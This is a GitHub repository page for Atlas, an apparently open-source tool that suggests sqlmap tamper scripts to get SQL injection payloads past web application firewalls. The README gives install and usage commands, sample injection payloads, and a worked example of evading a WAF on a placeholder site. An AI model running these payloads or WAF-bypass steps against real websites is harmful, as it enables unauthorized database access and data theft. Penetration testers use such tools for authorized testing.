Skip to content
Quick SQLMap Tamper Suggester
Branch: master
Clone or download
m4ll0k Merge pull request #2 from cclauss/patch-1
Old style exceptions --> new style
Latest commit 2f831e3 Mar 25, 2019
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
db First commit Oct 6, 2018
lib Merge pull request #2 from cclauss/patch-1 Mar 24, 2019
tamper Fixed random selection of letters in payload Mar 15, 2019
waf First commit Oct 6, 2018
LICENSE.txt Update LICENSE.txt Oct 6, 2018
README.md Update README.md Oct 6, 2018
atlas.py Old style exceptions --> new style Oct 8, 2018

README.md

Atlas - Quick SQLMap Tamper Suggester (beta v.)

Atlas is an open source tool that can suggest sqlmap tampers to bypass WAF/IDS/IPS, the tool is based on returned status code.

atlas_main

Screen

atlas_run

Installation

$ git clone https://github.com/m4ll0k/Atlas.git atlas
$ cd atlas
$ python atlas.py

Usage

$ python atlas.py --url http://site.com/index.php?id=Price_ASC --payload="-1234 AND 4321=4321-- AAAA" --dbms=mysql --random-agent -v

Example

  1. Run SQLMap:
$ python sqlmap.py -u 'http://site.com/index.php?id=Price_ASC' --dbs --random-agent -v 3

sqlmap

Price_ASC') AND 8716=4837 AND ('yajr'='yajr is blocked by WAF/IDS/IPS, now trying with Atlas:

$ python atlas.py --url 'http://site.com/index.php?id=Price_ASC' --payload="') AND 8716=4837 AND ('yajr'='yajr" --random-agent -v

atlas_succ

At this point:

$ python sqlmap.py -u 'http://site.com/index.php?id=Price_ASC' --dbs --random-agent -v 3 --tamper=versionedkeywords,...
You can’t perform that action at this time.